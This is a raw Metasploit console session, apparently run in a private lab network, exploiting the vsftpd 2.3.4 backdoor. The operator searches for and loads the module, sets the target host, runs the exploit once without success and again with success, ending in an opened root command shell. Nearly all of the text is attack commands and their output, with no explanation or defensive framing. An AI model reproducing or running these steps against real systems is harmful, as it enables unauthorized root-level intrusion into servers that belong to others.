msf > search vsftpd

[-] Warning: database not connected or cache not built, falling back to slow search



Matching Modules

================


  Name                                  Disclosure Date  Rank       Description

  ----                                  ---------------  ----       -----------

  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution



msf >

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf  exploit(vsftpd_234_backdoor) > show option

[-] Invalid parameter "option", use "show -h" for more information

msf  exploit(vsftpd_234_backdoor) > show options


Module options (exploit/unix/ftp/vsftpd_234_backdoor):


  Name   Current Setting  Required  Description

  ----   ---------------  --------  -----------

  RHOST                   yes       The target address

  RPORT  21               yes       The target port



Exploit target:


  Id  Name

  --  ----

  0   Automatic



msf  exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/vsftpd_234_backdoor


      Name: VSFTPD v2.3.4 Backdoor Command Execution

    Module: exploit/unix/ftp/vsftpd_234_backdoor

   Version: 14976

  Platform: Unix

Privileged: Yes

   License: Metasploit Framework License (BSD)

      Rank: Excellent


Provided by:

 hdm <hdm@metasploit.com>

 MC <mc@metasploit.com>


Available targets:

 Id  Name

 --  ----

 0   Automatic


Basic options:

 Name   Current Setting  Required  Description

 ----   ---------------  --------  -----------

 RHOST                   yes       The target address

 RPORT  21               yes       The target port


Payload information:

 Space: 2000

 Avoid: 0 characters


Description:

 This module exploits a malicious backdoor that was added to the

 VSFTPD download archive. This backdoor was introduced into the

 vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011

 according to the most recent information available. This backdoor

 was removed on July 3rd 2011.


References:

 http://www.osvdb.org/73573

 http://pastebin.com/AetT9sS5

 http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html


msf  exploit(vsftpd_234_backdoor) > show options


Module options (exploit/unix/ftp/vsftpd_234_backdoor):


  Name   Current Setting  Required  Description

  ----   ---------------  --------  -----------

  RHOST                   yes       The target address

  RPORT  21               yes       The target port



Exploit target:


  Id  Name

  --  ----

  0   Automatic



msf  exploit(vsftpd_234_backdoor) > set RHOST 172.16.24.150

RHOST => 172.16.24.150

msf  exploit(vsftpd_234_backdoor) > check

[*] This exploit does not support check.

msf  exploit(vsftpd_234_backdoor) > exploit


[*] Banner: 220 (vsFTPd 2.3.4)

[*] USER: 331 Please specify the password.

[*] Exploit completed, but no session was created.

msf  exploit(vsftpd_234_backdoor) > show options


Module options (exploit/unix/ftp/vsftpd_234_backdoor):


  Name   Current Setting  Required  Description

  ----   ---------------  --------  -----------

  RHOST  172.16.24.150    yes       The target address

  RPORT  21               yes       The target port



Payload options (cmd/unix/interact):


  Name  Current Setting  Required  Description

  ----  ---------------  --------  -----------



Exploit target:


  Id  Name

  --  ----

  0   Automatic



msf  exploit(vsftpd_234_backdoor) > exploit


[*] Banner: 220 (vsFTPd 2.3.4)

[*] USER: 331 Please specify the password.

[+] Backdoor service has been spawned, handling...

[+] UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (172.16.24.120:35183 -> 172.16.24.150:6200) at 2013-06-13 22:35:59 +0800